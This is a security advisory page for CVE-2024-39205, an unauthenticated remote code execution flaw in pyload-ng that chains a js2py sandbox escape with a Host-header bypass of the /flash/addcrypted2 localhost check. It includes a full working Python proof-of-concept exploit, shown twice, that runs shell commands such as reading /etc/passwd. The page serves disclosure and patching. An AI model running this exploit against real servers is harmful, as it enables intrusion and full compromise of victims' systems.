GHSA-r9pp-r4xf-597r
Vulnerability from github
Published
2024-09-09 18:17
Modified
2024-10-28 21:52
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.3 (Critical) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
pyload-ng vulnerable to RCE with js2py sandbox escape
Details

Summary

Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.

Details

js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the /flash/addcrypted2 API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.

PoC

The PoC is provided as poc.py below, you can modify the shell command it execute:

```python import socket import base64 from urllib.parse import quote

host, port = input("host: "), int(input("port: "))

payload = """ // [+] command goes here: let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;" let hacked, bymarve, n11 let getattr, obj

hacked = Object.getOwnPropertyNames({}) bymarve = hacked.getattribute n11 = bymarve("getattribute") obj = n11("class").base getattr = obj.getattribute

function findpopen(o) { let result; for(let i in o.subclasses()) { let item = o.subclasses()[i] if(item.module == "subprocess" && item.name == "Popen") { return item } if(item.name != "type" && (result = findpopen(item))) { return result } } }

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate() console.log(n11) function f() { return n11 }

"""

crypted_b64 = base64.b64encode(b"1234").decode()

data = f"package=pkg&crypted={quote(crypted_b64)}&jk={quote(payload)}"

request = f"""\ POST /flash/addcrypted2 HTTP/1.1 Host: 127.0.0.1:9666 Content-Type: application/x-www-form-urlencoded Content-Length: {len(data)}

{data} """.encode().replace(b"\n", b"\r\n")

def main():

s = socket.socket()
s.connect((host, port))

s.send(request)
response = s.recv(1024).decode()
print(response)

if name == "main": main()

```

Impact

Anyone who runs the latest version (<=0.5.0b3.dev85) of pyload-ng under python3.11 or below. pyload-ng doesn't use js2py for python3.12 or above.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.5.0b3.dev85"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-39205"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-09T18:17:20Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nAny pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.\n\n### Details\njs2py has a vulnerability of sandbox escape assigned as [CVE-2024-28397](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape), which is used by the `/flash/addcrypted2` API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.\n \n### PoC\n\nThe PoC is provided as `poc.py` below, you can modify the shell command it execute:\n\n```python\nimport socket\nimport base64\nfrom urllib.parse import quote\n\nhost, port = input(\"host: \"), int(input(\"port: \"))\n\npayload = \"\"\"\n// [+] command goes here:\nlet cmd = \"head -n 1 /etc/passwd; calc; gnome-calculator;\"\nlet hacked, bymarve, n11\nlet getattr, obj\n\nhacked = Object.getOwnPropertyNames({})\nbymarve = hacked.__getattribute__\nn11 = bymarve(\"__getattribute__\")\nobj = n11(\"__class__\").__base__\ngetattr = obj.__getattribute__\n\nfunction findpopen(o) {\n    let result;\n    for(let i in o.__subclasses__()) {\n        let item = o.__subclasses__()[i]\n        if(item.__module__ == \"subprocess\" \u0026\u0026 item.__name__ == \"Popen\") {\n            return item\n        }\n        if(item.__name__ != \"type\" \u0026\u0026 (result = findpopen(item))) {\n            return result\n        }\n    }\n}\n\nn11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()\nconsole.log(n11)\nfunction f() {\n    return n11\n}\n\n\"\"\"\n\ncrypted_b64 = base64.b64encode(b\"1234\").decode()\n\ndata = f\"package=pkg\u0026crypted={quote(crypted_b64)}\u0026jk={quote(payload)}\"\n\nrequest = f\"\"\"\\\nPOST /flash/addcrypted2 HTTP/1.1\nHost: 127.0.0.1:9666\nContent-Type: application/x-www-form-urlencoded\nContent-Length: {len(data)}\n\n{data}\n\"\"\".encode().replace(b\"\\n\", b\"\\r\\n\")\n\ndef main():\n\n    s = socket.socket()\n    s.connect((host, port))\n\n    s.send(request)\n    response = s.recv(1024).decode()\n    print(response)\n\nif __name__ == \"__main__\":\n    main()\n\n\n```\n\n### Impact\n\nAnyone who runs the latest version (\u003c=0.5.0b3.dev85) of  pyload-ng under python3.11 or below. pyload-ng doesn\u0027t use js2py for python3.12 or above.\n",
  "id": "GHSA-r9pp-r4xf-597r",
  "modified": "2024-10-28T21:52:37Z",
  "published": "2024-09-09T18:17:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-h95x-26f3-88hr"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "pyload-ng vulnerable to RCE with js2py sandbox escape"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.